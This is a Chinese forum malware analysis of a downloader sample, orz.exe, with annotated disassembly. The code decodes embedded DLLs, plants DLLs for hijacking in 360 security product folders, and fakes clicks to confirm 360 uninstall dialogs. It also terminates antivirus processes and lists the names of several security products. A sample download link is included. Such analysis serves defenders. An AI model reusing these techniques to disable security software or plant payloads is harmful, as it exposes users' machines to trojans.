猫癣(犇牛)病毒 主程序 orz.exe分析
From:bbs.pediy.com by:itcool 从挂马简报里的被挂马的网站获得病毒样本..发现被挂的都是同一个下载者..然后我对主程序就简要的
分析了下.. 发现是猫癣 不过这个和之前我分析的猫癣有些差异..
分析得到下载地址..然后又得到好多样本..多是游戏木马..哈哈..这下发了
样本下载 http://yben.ys168.com/
1 找到本进程的父进程..
实现:利用 GetCurrentProcessId 得到本进程的ID 再用Process32First 与 Process32Next 与ID比较 相等了,通过结构体获得父进程ID
{
; --- orz18.00415CA6 (author's step 1): return the parent PID of the running process.
; Takes a TH32CS_SNAPPROCESS snapshot and walks it with Process32First/Process32Next until the
; entry's th32ProcessID equals GetCurrentProcessId(); then returns th32ParentProcessID from that
; same PROCESSENTRY32. The bracket contents of the ss: operands were lost in extraction; the
; offsets recovered from the opcode bytes (394424 10 = cmp [esp+10],eax; 8B4424 20 = mov eax,[esp+20])
; match the th32ProcessID / th32ParentProcessID fields of an entry placed at [esp+8].
; The listing starts mid-prologue: the sub esp,128 that pairs with add esp,128 below is not quoted.
; NOTE(review): the snapshot handle in esi is never passed to CloseHandle on either exit path, and in
; the Process32Next loop the API's return value is overwritten by `call edi` before anything tests it,
; so the loop ends only on a PID match.
00415CA6 |.56 push esi
00415CA7 |.57 push edi
00415CA8 |.33C0 xor eax,eax
00415CAA |.B9 49000000 mov ecx,49
00415CAF |.8D7C24 0C lea edi,dword ptr ss:
00415CB3 |.C74424 08 0000>mov dword ptr ss:,0
00415CBB |.50 push eax ; /ProcessID => 0
00415CBC |.6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00415CBE |.F3:AB rep stos dword ptr es: ; |
00415CC0 |.E8 37060000 call orz18.004162FC ; \CreateToolhelp32Snapshot
00415CC5 |.8BF0 mov esi,eax
00415CC7 |.83FE FF cmp esi,-1
00415CCA |.75 0B jnz short orz18.00415CD7
; snapshot failed (INVALID_HANDLE_VALUE): return 0
00415CCC |.5F pop edi
00415CCD |.33C0 xor eax,eax
00415CCF |.5E pop esi
00415CD0 |.81C4 28010000add esp,128
00415CD6 |.C3 retn
; PROCESSENTRY32.dwSize = 0x128, entry lives at [esp+8]
00415CD7 |>8D4424 08 lea eax,dword ptr ss:
00415CDB |.C74424 08 2801>mov dword ptr ss:,128
00415CE3 |.50 push eax ; /pProcessentry
00415CE4 |.56 push esi ; |hSnapshot
00415CE5 |.E8 0C060000 call orz18.004162F6 ; \Process32First
00415CEA |.85C0 test eax,eax
00415CEC |.74 21 je short orz18.00415D0F
00415CEE |.8B3D 5C104000mov edi,dword ptr ds: ;kernel32.GetCurrentProcessId
00415CF4 |.FFD7 call edi ; [GetCurrentProcessId
00415CF6 |.394424 10 cmp dword ptr ss:,eax
00415CFA |.74 13 je short orz18.00415D0F
; loop: next entry, re-read own PID, compare; Process32Next's result is not checked
00415CFC |>8D4C24 08 /lea ecx,dword ptr ss:
00415D00 |.51 |push ecx ; /pProcessentry
00415D01 |.56 |push esi ; |hSnapshot
00415D02 |.E8 E9050000 |call orz18.004162F0 ; \Process32Next
00415D07 |.FFD7 |call edi
00415D09 |.394424 10 |cmp dword ptr ss:,eax
00415D0D |.^ 75 ED \jnz short orz18.00415CFC
; eax = th32ParentProcessID of the matched entry (zeroed memory if Process32First failed)
00415D0F |>8B4424 20 mov eax,dword ptr ss:
00415D13 |.5F pop edi
00415D14 |.5E pop esi
00415D15 |.81C4 28010000add esp,128
00415D1B \.C3 retn
}
2 创建 CreateMutexA 对象 判断创建的互斥体是否名为"oioipuy",若此互斥变量存在,则退出进程;
{
; --- Step 2: single-instance guard. CreateMutexA on the fixed name "oioipuy" (InitialOwner=TRUE)
; followed by GetLastError; the author states the process exits when the mutex already exists —
; the ERROR_ALREADY_EXISTS comparison itself is not in the quoted lines. The mutex name is a
; static host indicator for this sample.
004161AE |> \68 F8434100 push orz18.004143F8 ; /MutexName = "oioipuy"
004161B3 |.6A 01 push 1 ; |InitialOwner = TRUE
004161B5 |.56 push esi ; |pSecurity
004161B6 |.FF15 74104000call dword ptr ds: ; \CreateMutexA
004161BC |.FF15 70104000call dword ptr ds: ;ntdll.RtlGetLastWin32Error
}
3 在C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\创建文件1696,创建之前先在内存中还原1696
1696文件数据在内存中还原
{
; --- Step 3 helper: in-place decode of the embedded "1696" payload. Single-byte XOR with the
; constant key 7 (cl) over 0x2A80 bytes of a buffer in the image (the ds: operand's bracket contents
; were lost in extraction; the author's note names 0040D704). A constant-key XOR like this keeps the
; embedded file from matching signatures in the file image, but the decoded bytes are present in
; memory right after this loop, which is where a dump or an emulation of these eight instructions
; recovers them.
00416170 33C0 xor eax,eax
00416172 B1 07 mov cl,7
00416174 8A90 24D74000 mov dl,byte ptr ds:-->points to memory buffer 0040D704
0041617A 32D1 xor dl,cl
0041617C 8890 24D74000 mov byte ptr ds:,dl
00416182 40 inc eax
00416183 3D 802A0000 cmp eax,2A80
00416188 ^ 7C EA jl short orz18.00416174
}
4 在1696文件头部加MZ
{
; --- Step 4: restore the "MZ" signature on the dropped file. The payload is written without its
; first two bytes and they are patched in afterwards: CreateFileA → SetFilePointer (three pushes of
; esi; esi is presumably 0 here, i.e. distance 0 / FILE_BEGIN — it is set above the quoted lines)
; → WriteFile of the 2-byte string "MZ" → CloseHandle. Stripping the DOS header from an embedded
; PE is a common way to avoid carving tools; the decoded blob in memory lacks "MZ" until this write.
00416136 FF15 A0104000 call dword ptr ds: ; kernel32.CreateFileA
00416138 56 push esi
0041613D 8BF8 mov edi,eax
0041613F 56 push esi
00416140 56 push esi
00416141 57 push edi
00416142 FF15 60104000 call dword ptr ds: ; kernel32.SetFilePointer
00416148 8D45 08 lea eax,dword ptr ss:
0041614B 56 push esi
0041614C 50 push eax
0041614D 6A 02 push 2
0041614F 68 74434100 push orz18.00414374 ; ASCII "MZ"
00416154 57 push edi
00416155 FF15 A4104000 call dword ptr ds: ; kernel32.WriteFile
0041615B 57 push edi
0041615C FF15 AC104000 call dword ptr ds: ; kernel32.CloseHandle
}
004158A7 68 30D54000 push orz18.0040D530 ; ASCII "safeboxTray.exe"
5 在内存中把 safeboxTray.exe 360tray.exe usp10.dll /u. 还原出来
还原过程 00414960
{
; --- Step 5 helper (inside orz18.00414960): in-place decode of the embedded name strings the author
; lists ("safeboxTray.exe", "360tray.exe", "usp10.dll", "/u"). For byte index i (edx):
;   b[i] += (i - 0x3B) << 1   (8-bit arithmetic, so it wraps)
; The loop bound is recomputed every pass as strlen(esi) via repne scas / not ecx / dec ecx.
; The transform is position-dependent, so the plaintext names are not in the file image and a
; fixed-key XOR search will not find them; the decoded strings are in memory once this loop exits.
0041498A |> /8A0C32 /mov cl,byte ptr ds:
0041498D |. |8AC2 |mov al,dl
0041498F |. |2C 3B |sub al,3B
00414991 |. |8BFE |mov edi,esi
00414993 |. |D0E0 |shl al,1
00414995 |. |02C8 |add cl,al
00414997 |. |33C0 |xor eax,eax
00414999 |. |880C32 |mov byte ptr ds:,cl
; strlen(esi) -> ecx, then continue while edx < strlen
0041499C |. |83C9 FF |or ecx,FFFFFFFF
0041499F |. |42 |inc edx
004149A0 |. |F2:AE |repne scas byte ptr es:
004149A2 |. |F7D1 |not ecx
004149A4 |. |49 |dec ecx
004149A5 |. |3BD1 |cmp edx,ecx
004149A7 |.^\72 E1 \jb short orz18.0041498A
}
6 在进程中查找 safeboxTray.exe,找到之后打开该进程,再用 EnumProcessModules 和 GetModuleFileNameExA
得到路径C:\Program Files\360\360safebox\SafeBoxtray.exe
7 替换文件,然后把rptup.dll在内存里数据还原,再创建C:\Program Files\360\360safebox\rptup.dll
实现 : MoveFileExA(C:\Program Files\360\360safebox\rptup.dll,新C:\Program Files\360\360safebox\libspyerps.dat)
00415ACA |.E8 F1EDFFFF call orz18.004148C0
{
rptup.dll在内存里数据还原
{
; --- Decode loop inside orz18.004148C0 (called at 00415ACA for rptup.dll and again at 00415E7A for
; the 12234.dll drop): XOR of 0xC400 bytes at the ds: operand (bracket contents lost in extraction)
; with the key byte in cl, which is loaded above the quoted lines. Same shape as the step-3 loop,
; different buffer and length.
004148A4 |> /8A90 30114000/mov dl,byte ptr ds:
004148AA |. |32D1 |xor dl,cl
004148AC |. |8890 30114000|mov byte ptr ds:,dl
004148B2 |. |40 |inc eax
004148B3 |. |3D 00C40000 |cmp eax,0C400
004148B8 |.^\7C EA \jl short orz18.004148A4
}
}
8 创建C:\Program Files\360\360safebox\usp10.dll
9 创建一个进程 执行 C:\Program Files\360\360safebox\SafeBoxtray.exe /u,然后弹出360保险箱卸载提示
模拟鼠标点击
{
; --- Step 9 helper: dismiss the product's confirmation box with synthetic mouse input.
; The function entry and the sub esp,11C that pairs with add esp,11C below are above the quoted
; lines, and the jnz at 00415405 (title does not match) leaves the excerpt.
; Flow: GetForegroundWindow → GetWindowTextA into a zeroed 0x104-byte buffer → save the cursor with
; GetCursorPos → _stricmp against "360保险箱提示". On a match: GetWindowRect, SetCursorPos to a fixed
; offset from the window rectangle (by the opcode bytes: Y = top + 0xBE, X = right − 0xE6; the base
; registers were lost in extraction), mouse_event LEFTDOWN then LEFTUP with MOUSEEVENTF_ABSOLUTE,
; and finally SetCursorPos back to the saved point. Returns eax = 1 on this path.
; For defenders: a confirmation that can be satisfied by mouse_event/SendInput from the same desktop
; is not a security boundary; an uninstall prompt should be gated by UAC or a secure desktop.
004153B6 |.56 push esi
004153B7 |.57 push edi
004153B8 |.FF15 F8104000call dword ptr ds: ; [\\ GetForegroundWindow returns the foreground window
004153BE |.8BF0 mov esi,eax
004153C0 |.B9 40000000 mov ecx,40
004153C5 |.33C0 xor eax,eax
004153C7 |.8D7C24 21 lea edi,dword ptr ss:
004153CB |.C64424 20 00 mov byte ptr ss:,0
004153D0 |.68 04010000 push 104 ; /Count = 104 (260.)
004153D5 |.F3:AB rep stos dword ptr es: ; |
004153D7 |.66:AB stos word ptr es: ; |
004153D9 |.AA stos byte ptr es: ; |
004153DA |.8D4424 24 lea eax,dword ptr ss: ; |
004153DE |.50 push eax ; |Buffer
004153DF |.56 push esi ; |hWnd
004153E0 |.FF15 20114000call dword ptr ds: ; \GetWindowTextA
004153E6 |.8D4C24 08 lea ecx,dword ptr ss:
004153EA |.51 push ecx ; /pPoint
004153EB |.FF15 14114000call dword ptr ds: ; \GetCursorPos
004153F1 |.8D5424 20 lea edx,dword ptr ss:
004153F5 |.68 50D54000 push orz18.0040D550 ; /s2 = "360保险箱提示"
004153FA |.52 push edx ; |s1
004153FB |.E8 300F0000 call orz18.00416330 ; \_stricmp
00415400 |.83C4 08 add esp,8
00415403 |.85C0 test eax,eax
00415405 |.75 68 jnz short orz18.0041546F
00415407 |.53 push ebx
00415408 |.8D4424 14 lea eax,dword ptr ss:
0041540C |.55 push ebp
0041540D |.50 push eax ; /pRect
0041540E |.56 push esi ; |hWnd
0041540F |.FF15 FC104000call dword ptr ds: ; \\\ \\GetWindowRect window bounding rectangle
; edx = rect.top, ecx = rect.right (offsets by the opcode bytes)
00415415 |.8B5424 1C mov edx,dword ptr ss:
00415419 |.8B4C24 20 mov ecx,dword ptr ss:
0041541D |.8B1D F4104000mov ebx,dword ptr ds: ;USER32.SetCursorPos
00415423 |.8DBA BE000000lea edi,dword ptr ds:
00415429 |.8DB1 1AFFFFFFlea esi,dword ptr ds:
0041542F |.57 push edi ; /Y
00415430 |.56 push esi ; |X
00415431 |.FFD3 call ebx ; \SetCursorPos
00415433 |.8B2D F0104000mov ebp,dword ptr ds: ;USER32.mouse_event
00415439 |.6A 00 push 0 ; /ExtraInfo = 0
0041543B |.6A 00 push 0 ; |Reserved = 0
0041543D |.57 push edi ; |dY
0041543E |.56 push esi ; |dX
0041543F |.68 02800000 push 8002 ; |Flags = MOUSEEVENTF_LEFTDOWN|MOUSEEVENTF_ABSOLUTE
00415444 |.FFD5 call ebp ; \mouse_event
00415446 |.6A 00 push 0 ; /ExtraInfo = 0
00415448 |.6A 00 push 0 ; |Reserved = 0
0041544A |.57 push edi ; |dY
0041544B |.56 push esi ; |dX
0041544C |.68 04800000 push 8004 ; |Flags = MOUSEEVENTF_LEFTUP|MOUSEEVENTF_ABSOLUTE
00415451 |.FFD5 call ebp ; \mouse_event
; restore the cursor position saved by GetCursorPos above
00415453 |.8B4424 14 mov eax,dword ptr ss:
00415457 |.8B4C24 10 mov ecx,dword ptr ss:
0041545B |.50 push eax ; /Y
0041545C |.51 push ecx ; |X
0041545D |.FFD3 call ebx ; \SetCursorPos
0041545F |.5D pop ebp
00415460 |.5B pop ebx ;USER32.SetCursorPos
00415461 |.5F pop edi
00415462 |.B8 01000000 mov eax,1
00415467 |.5E pop esi
00415468 |.81C4 1C010000add esp,11C
0041546E |.C3 retn
}
10 结束进程 safeboxTray.exe 360tray.exe
00415B28 |> \E8 13FBFFFF call orz18.00415640
{
; --- Step 10, body of orz18.00415640 (entry, snapshot creation and the sub esp,130 are above the
; quoted lines). For every snapshot entry whose szExeFile matches "safeboxTray.exe" or
; "360tray.exe" (lstrcmpiA, case-insensitive): OpenProcess with PROCESS_TERMINATE (1) →
; TerminateProcess(…, 0) → CloseHandle → Sleep(10 ms) → MessageBoxA(-1, 00416658, 00416658, 0),
; where 00416658 is shown as "" elsewhere on this page. Process32Next drives the loop; the
; snapshot handle is closed at 00415713 on both paths. CloseHandle is also reached with esi = 0
; when OpenProcess failed (harmless). The return value is a dword from the frame; by the offsets it
; is the slot the last TerminateProcess result was stored in at 004156E3 — unverified here.
00415671 |.55 push ebp
00415672 |.50 push eax ; /pProcessentry
00415673 |.56 push esi ; |hSnapshot
00415674 |.C74424 18 2801>mov dword ptr ss:,128 ; |
0041567C |.E8 750C0000 call orz18.004162F6 ; \Process32First
00415681 |.8B2D AC104000mov ebp,dword ptr ds: ;kernel32.CloseHandle
00415687 |.85C0 test eax,eax
00415689 |.0F84 84000000je orz18.00415713
0041568F |.53 push ebx
00415690 |.8B1D 24114000mov ebx,dword ptr ds: ;USER32.MessageBoxA
00415696 |.57 push edi
00415697 |.8B3D 88104000mov edi,dword ptr ds: ;kernel32.Sleep
; per-entry: compare szExeFile with both target names
0041569D |>8D4C24 3C /lea ecx,dword ptr ss:
004156A1 |.68 30D54000 |push orz18.0040D530 ; /String2 = "safeboxTray.exe"
004156A6 |.51 |push ecx ; |String1
004156A7 |.FF15 40104000|call dword ptr ds: ; \lstrcmpiA
004156AD |.85C0 |test eax,eax
004156AF |.74 14 |je short orz18.004156C5
004156B1 |.8D5424 3C |lea edx,dword ptr ss:
004156B5 |.68 40D54000 |push orz18.0040D540 ; /String2 = "360tray.exe"
004156BA |.52 |push edx ; |String1
004156BB |.FF15 40104000|call dword ptr ds: ; \lstrcmpiA
004156C1 |.85C0 |test eax,eax
004156C3 |.75 3D |jnz short orz18.00415702
; match: open with PROCESS_TERMINATE and terminate
004156C5 |>8B4424 20 |mov eax,dword ptr ss:
004156C9 |.50 |push eax ; /ProcessId
004156CA |.6A 00 |push 0 ; |Inheritable = FALSE
004156CC |.6A 01 |push 1 ; |Access = TERMINATE
004156CE |.FF15 98104000|call dword ptr ds: ; \OpenProcess
004156D4 |.8BF0 |mov esi,eax
004156D6 |.85F6 |test esi,esi
004156D8 |.74 0D |je short orz18.004156E7
004156DA |.6A 00 |push 0 ; /ExitCode = 0
004156DC |.56 |push esi ; |hProcess
004156DD |.FF15 9C104000|call dword ptr ds: ; \TerminateProcess
004156E3 |.894424 10 |mov dword ptr ss:,eax
004156E7 |>56 |push esi
004156E8 |.FFD5 |call ebp //CloseHandle
004156EA |.6A 0A |push 0A
004156EC |.FFD7 |call edi //sleep
; MessageBoxA(hWnd=-1, text="", caption="", style=0)
004156EE |.6A 00 |push 0
004156F0 |.68 58664100 |push orz18.00416658
004156F5 |.68 58664100 |push orz18.00416658
004156FA |.6A FF |push -1
004156FC |.FFD3 |call ebx
; reload the snapshot handle, esi was reused for the process handle
004156FE |.8B7424 14 |mov esi,dword ptr ss:
00415702 |>8D4C24 18 |lea ecx,dword ptr ss:
00415706 |.51 |push ecx ; /pProcessentry
00415707 |.56 |push esi ; |hSnapshot
00415708 |.E8 E30B0000 |call orz18.004162F0 ; \Process32Next
0041570D |.85C0 |test eax,eax
0041570F |.^ 75 8C \jnz orz18.0041569D
00415711 |.5F pop edi
00415712 |.5B pop ebx
00415713 |>56 push esi
00415714 |.FFD5 call ebp //CloseHandle
00415716 |.8B4424 08 mov eax,dword ptr ss:
0041571A |.5D pop ebp
0041571B |.5E pop esi
0041571C |.81C4 30010000add esp,130
00415722 \.C3 retn
}
11 在进程中查找 360tray.exe,找到之后打开该进程,再用 EnumProcessModules 和 GetModuleFileNameExA ,
得到路径C:\Program Files\360\360Safe\safemon\360tray.exe,由这个路径得到C:\Program Files\360\360Safe\+++deepscan\uninst.exe
CopyFileA(C:\Program Files\360\360Safe\uninst.exe,新C:\Program Files\360\360Safe\+++deepscan\uninst.exe)
{
; --- Step 11: CopyFileA(existing = the uninst.exe path in the frame, new = the path just built with
; rep movs). The string assembly and the pushed FailIfExists value are above the quoted lines; the
; two paths are the ones given in the author's text.
0041506E |.50 push eax ; |NewFileName
0041506F |.F3:A4 rep movs byte ptr es:,byte ptr ds: ; |
00415071 |.8D8C24 4C02000>lea ecx,dword ptr ss: ; |
00415078 |.51 push ecx ; |ExistingFileName
00415079 |.FF15 3C104000call dword ptr ds: ; \CopyFileA
}
12 创建 C:\Program Files\360\360Safe\deepscan\usp10.dll
实现:
数据还原
{
; --- Step 12 decode: the same six instructions from orz18.004148C0 already quoted for step 7 —
; XOR of 0xC400 bytes at the ds: operand (bracket contents lost) with the key byte in cl, set above
; the quoted lines. The author re-quotes the loop because the deepscan\usp10.dll payload is produced
; by the same routine as rptup.dll; the distinguishing call for this step is 00415B2D → 00414E20.
004148A4 |> /8A90 30114000/mov dl,byte ptr ds:
004148AA |. |32D1 |xor dl,cl
004148AC |. |8890 30114000|mov byte ptr ds:,dl
004148B2 |. |40 |inc eax
004148B3 |. |3D 00C40000 |cmp eax,0C400
004148B8 |.^\7C EA \jl short orz18.004148A4
}
关键00415B2D |.E8 EEF2FFFF call orz18.00414E20
00415100 |.FF15 34104000call dword ptr ds: ; \CreateThread
13 创建一个线程
; --- Step 13: Sleep(10 ms), CreateThread(orz18.00414D30, no parameter) — the handle returned in eax is
; overwritten by the next lea and is neither stored nor closed — then orz18.00414D90 (listed under
; step 14) is called with a stack buffer as its single argument.
004150E9 |.6A 0A push 0A ; /Timeout = 10. ms
004150EB |.FF15 88104000call dword ptr ds: ; \Sleep
004150F1 |.6A 00 push 0 ; /pThreadId = NULL
004150F3 |.6A 00 push 0 ; |CreationFlags = 0
004150F5 |.6A 00 push 0 ; |pThreadParm = NULL
004150F7 |.68 304D4100 push orz18.00414D30 ; |ThreadFunction = orz18.00414D30
004150FC |.6A 00 push 0 ; |StackSize = 0
004150FE |.6A 00 push 0 ; |pSecurity = NULL
00415100 |.FF15 34104000call dword ptr ds: ; \CreateThread
00415106 |.8D4424 18 lea eax,dword ptr ss:
0041510A |.50 push eax ; /Arg1
0041510B |.E8 80FCFFFF call orz18.00414D90 ; \orz18.00414D90
线程函数
{
发消息卸载 呵呵
{
; --- orz18.00414A70: press "是" (Yes) in the "360安全卫士" dialog by window message.
; FindWindowA(class "#32770" = standard dialog, title "360安全卫士") → FindWindowExA(child of class
; "Button" titled "是") → two WM_LBUTTONDOWN / WM_LBUTTONUP pairs via SendMessageA with Sleep(10 ms)
; between the pairs. Takes no argument. Returns eax = 1 when the button was found and messaged,
; 0 when either window is missing. Only esi/edi are saved.
; For defenders: a dialog cannot distinguish these posted messages from a real click; the uninstall
; confirmation is therefore not a barrier against code already running on the same desktop.
00414A70 /$56 push esi
00414A71 |.68 8CD54000 push orz18.0040D58C ; /Title = "360安全卫士"
00414A76 |.68 A0D54000 push orz18.0040D5A0 ; |Class = "#32770"
00414A7B |.FF15 28114000call dword ptr ds: ; \FindWindowA
00414A81 |.85C0 test eax,eax
00414A83 |.74 60 je short orz18.00414AE5
00414A85 |.68 A8D54000 push orz18.0040D5A8 ; /Title = "是"
00414A8A |.68 98D54000 push orz18.0040D598 ; |Class = "Button"
00414A8F |.6A 00 push 0 ; |hAfterWnd = NULL
00414A91 |.50 push eax ; |hParent
00414A92 |.FF15 08114000call dword ptr ds: ; \FindWindowExA
00414A98 |.8BF0 mov esi,eax
00414A9A |.85F6 test esi,esi
00414A9C |.74 47 je short orz18.00414AE5
00414A9E |.57 push edi
00414A9F |.8B3D 0C114000mov edi,dword ptr ds: ;USER32.SendMessageA
; first click: WM_LBUTTONDOWN (0x201) + WM_LBUTTONUP (0x202)
00414AA5 |.6A 00 push 0 ; /lParam = 0
00414AA7 |.6A 00 push 0 ; |wParam = 0
00414AA9 |.68 01020000 push 201 ; |Message = WM_LBUTTONDOWN
00414AAE |.56 push esi ; |hWnd
00414AAF |.FFD7 call edi ; \SendMessageA
00414AB1 |.6A 00 push 0 ; /lParam = 0
00414AB3 |.6A 00 push 0 ; |wParam = 0
00414AB5 |.68 02020000 push 202 ; |Message = WM_LBUTTONUP
00414ABA |.56 push esi ; |hWnd
00414ABB |.FFD7 call edi ; \SendMessageA
00414ABD |.6A 0A push 0A ; /Timeout = 10. ms
00414ABF |.FF15 88104000call dword ptr ds: ; \Sleep
; second click, same messages
00414AC5 |.6A 00 push 0 ; /lParam = 0
00414AC7 |.6A 00 push 0 ; |wParam = 0
00414AC9 |.68 01020000 push 201 ; |Message = WM_LBUTTONDOWN
00414ACE |.56 push esi ; |hWnd
00414ACF |.FFD7 call edi ; \SendMessageA
00414AD1 |.6A 00 push 0 ; /lParam = 0
00414AD3 |.6A 00 push 0 ; |wParam = 0
00414AD5 |.68 02020000 push 202 ; |Message = WM_LBUTTONUP
00414ADA |.56 push esi ; |hWnd
00414ADB |.FFD7 call edi ; \SendMessageA
00414ADD |.5F pop edi
00414ADE |.B8 01000000 mov eax,1
00414AE3 |.5E pop esi
00414AE4 |.C3 retn
; not found: return 0
00414AE5 |>33C0 xor eax,eax
00414AE7 |.5E pop esi
00414AE8 \.C3 retn
}
}
14 创建一个进程执行C:\Program Files\360\360Safe\deepscan\uninst.exe_?=C:\D
0041510B |.E8 80FCFFFF
{
; --- orz18.00414D90(lpCommandLine) — stdcall, one argument (retn 4); called from 0041510B with a
; stack buffer (the author gives the command line as the deepscan\uninst.exe invocation).
; Zeroes a STARTUPINFOA / PROCESS_INFORMATION pair on the stack, then sets cb = 0x44, dwFlags = 1
; (STARTF_USESHOWWINDOW) and wShowWindow = 0 (SW_HIDE) — the field offsets are taken from the opcode
; bytes since the bracket contents are missing — and calls CreateProcessA(NULL, cmdline, NULL, NULL,
; FALSE, 0, NULL, NULL, &si, &pi): the uninstaller runs with a hidden window.
; Then WaitForInputIdle(pi.hProcess, INFINITE) and CreateThread(orz18.004149F0) (listed under
; step 15). Returns 0. The CreateProcessA result and the process/thread handles are never checked
; or closed.
00414D90 /$83EC 54 sub esp,54
00414D93 |.33C0 xor eax,eax
00414D95 |.57 push edi
00414D96 |.894424 08 mov dword ptr ss:,eax
00414D9A |.B9 10000000 mov ecx,10
00414D9F |.894424 0C mov dword ptr ss:,eax
00414DA3 |.8D7C24 18 lea edi,dword ptr ss:
00414DA7 |.F3:AB rep stos dword ptr es:
00414DA9 |.8D4C24 04 lea ecx,dword ptr ss:
00414DAD |.8D5424 14 lea edx,dword ptr ss:
00414DB1 |.51 push ecx ; /pProcessInfo
00414DB2 |.52 push edx ; |pStartupInfo
00414DB3 |.50 push eax ; |CurrentDir => NULL
00414DB4 |.50 push eax ; |pEnvironment => NULL
00414DB5 |.50 push eax ; |CreationFlags => 0
00414DB6 |.50 push eax ; |InheritHandles => FALSE
00414DB7 |.50 push eax ; |pThreadSecurity => NULL
00414DB8 |.894424 2C mov dword ptr ss:,eax ; |
; si.wShowWindow = 0 (SW_HIDE)
00414DBC |.66:894424 60 mov word ptr ss:,ax ; |
00414DC1 |.50 push eax ; |pProcessSecurity => NULL
00414DC2 |.8B4424 7C mov eax,dword ptr ss: ; |
00414DC6 |.C74424 24 0000>mov dword ptr ss:,0 ; |
00414DCE |.50 push eax ; |CommandLine
00414DCF |.6A 00 push 0 ; |ModuleFileName = NULL
; si.cb = sizeof(STARTUPINFOA); si.dwFlags = STARTF_USESHOWWINDOW
00414DD1 |.C74424 3C 4400>mov dword ptr ss:,44 ; |
00414DD9 |.C74424 68 0100>mov dword ptr ss:,1 ; |
00414DE1 |.FF15 38104000call dword ptr ds: ; \CreateProcessA
00414DE7 |.6A FF push -1 ; /Timeout = INFINITE
00414DE9 |.8B4C24 08 mov ecx,dword ptr ss: ; |
00414DED |.51 push ecx ; |hProcess
00414DEE |.FF15 04114000call dword ptr ds: ; \WaitForInputIdle
00414DF4 |.6A 00 push 0 ; /pThreadId = NULL
00414DF6 |.6A 00 push 0 ; |CreationFlags = 0
00414DF8 |.6A 00 push 0 ; |pThreadParm = NULL
00414DFA |.68 F0494100 push orz18.004149F0 ; |ThreadFunction = orz18.004149F0
00414DFF |.6A 00 push 0 ; |StackSize = 0
00414E01 |.6A 00 push 0 ; |pSecurity = NULL
00414E03 |.FF15 34104000call dword ptr ds: ; \CreateThread
00414E09 |.33C0 xor eax,eax
00414E0B |.5F pop edi
00414E0C |.83C4 54 add esp,54
00414E0F \.C2 0400 retn 4
}
15 卸载之后又创建一条线程 删除C:\Program Files\360\360Safe\deepscan\usp10.dll
线程 004149F0
{
; --- orz18.004149F0 thread (step 15; the retn after the pops is not quoted). Up to 0x96 (150)
; attempts of Sleep(0x12C = 300 ms) then DeleteFileA on the deepscan\usp10.dll path, stopping at the
; first non-zero (success) result. The retry loop is presumably there because the DLL stays locked
; while the uninstaller it was planted next to is still running — not verifiable from these lines.
004149F0 .53 push ebx
004149F1 .56 push esi
004149F2 .8B35 88104000mov esi,dword ptr ds: ;kernel32.Sleep
004149F8 .57 push edi
004149F9 .8B3D 7C104000mov edi,dword ptr ds: ;kernel32.DeleteFileA
004149FF .33DB xor ebx,ebx
00414A01 >68 2C010000 push 12C
00414A06 .FFD6 call esi
00414A08 .68 54654100 push orz18.00416554 ;ASCII "C:\Program Files\360\360Safe\deepscan\usp10.dll"
00414A0D .FFD7 call edi
00414A0F .85C0 test eax,eax
00414A11 .75 0D jnz short orz18.00414A20
00414A13 .43 inc ebx
00414A14 .81FB 96000000cmp ebx,96
00414A1A .^ 7C E5 jl short orz18.00414A01
00414A1C .5F pop edi
00414A1D .5E pop esi
00414A1E .5B pop ebx
}
16 删除 C:\Program Files\360\360safebox\usp10.dll C:\Program Files\360\360safebox\rptup.dll
用rptup.dll替换libspyerps.dat
; --- Step 16 (inside the caller; esi holds DeleteFileA here). Deletes 360safebox\usp10.dll and
; 360safebox\rptup.dll, then MoveFileExA with MOVEFILE_REPLACE_EXISTING (1). By the push order
; (flags, then lpNewFileName = edx, then lpExistingFileName = eax) and the author's labels, the
; existing file is libspyerps.dat and the new name is rptup.dll — i.e. the original DLL that step 7
; parked as libspyerps.dat is moved back into place once the planted copy has served its purpose.
00415B3C |.50 push eax ; /C:\Program Files\360\360safebox\usp10.dll
00415B3D |.FFD6 call esi ; \DeleteFileA
00415B3F |.8D4C24 78 lea ecx,dword ptr ss:[esp+>
00415B43 |.51 push ecx ; /C:\Program Files\360\360safebox\rptup.dll
00415B44 |.FFD6 call esi ; \DeleteFileA
00415B46 |.8D5424 78 lea edx,dword ptr ss:[esp+>
00415B4A |.6A 01 push 1 ; /Flags = REPLACE_EXISTING
00415B4C |.8D8424 8001000>lea eax,dword ptr ss:[esp+>; |
00415B53 |.52 push edx ; |C:\Program Files\360\360safebox\rptup.dll
00415B54 |.50 push eax ; |ExistingFileExA C:\Program Files\360\360safebox\libspyerps.dat
00415B55 |.FF15 50104000call dword ptr ds: ; \MoveFileExA
17 查杀进程
kavstart.exe.kissvc.exe.kmailmon.exe.kpfw32.exe.kpfwsvc.exe.kwatch.exe.ccenter.exe.ras.exe.
rstray.exe.rsagent.exe..ravtask.exe.ravstub.exe.ravmon.exe.ravmond.exe.avp.exe.360safebox.exe.
360Safe.exe.Thunder5.exe.rfwmain.exe.rfwstub.exe.rfwsrv.exe..
{
; --- orz18.00415EC0 (step 17): scan the process list against the embedded table of product names.
; Returns al: 0 if the snapshot could not be taken, otherwise a flag byte kept at [esp+7] that is
; set when a listed name was matched (see below).
; Per snapshot entry, for ebp = 0..0x15 (22 slots): esi = table entry — by the opcode bytes
; lea esi,[ecx+ebp+0040D5AC] with ecx = ebp<<4, so the slots look 17 bytes apart; names shorter
; than 4 characters are skipped. While the byte at 0040D722 is non-zero the entry is first decoded
; in place by orz18.00415D20 (the author's "restore data" note); that byte is cleared at 00415F9A
; after the first process, so decoding happens once. Then lstrcmpiA against szExeFile.
; NOTE(review): on a match, `cmp ebp,11 / jnz 00415F8B` sends every index except 0x11 to 00415F8B,
; which only sets the return flag and moves to the next process. Only the entry at index 0x11 reaches
; OpenProcess(PROCESS_TERMINATE) → MessageBoxA(-3, NULL, NULL, 0) → TerminateProcess → CloseHandle.
; As quoted, the routine mostly *detects* the listed products and terminates one specific entry;
; which name sits at index 0x11 depends on the table layout, which is not shown on this page.
00415EC0 /$81EC 30010000sub esp,130
00415EC6 |.56 push esi
00415EC7 |.6A 00 push 0 ; /ProcessID = 0
00415EC9 |.6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00415ECB |.C64424 0F 00 mov byte ptr ss:,0 ; |
00415ED0 |.E8 27040000 call orz18.004162FC ; \CreateToolhelp32Snapshot
00415ED5 |.8BF0 mov esi,eax
00415ED7 |.83FE FF cmp esi,-1
00415EDA |.897424 08 mov dword ptr ss:,esi
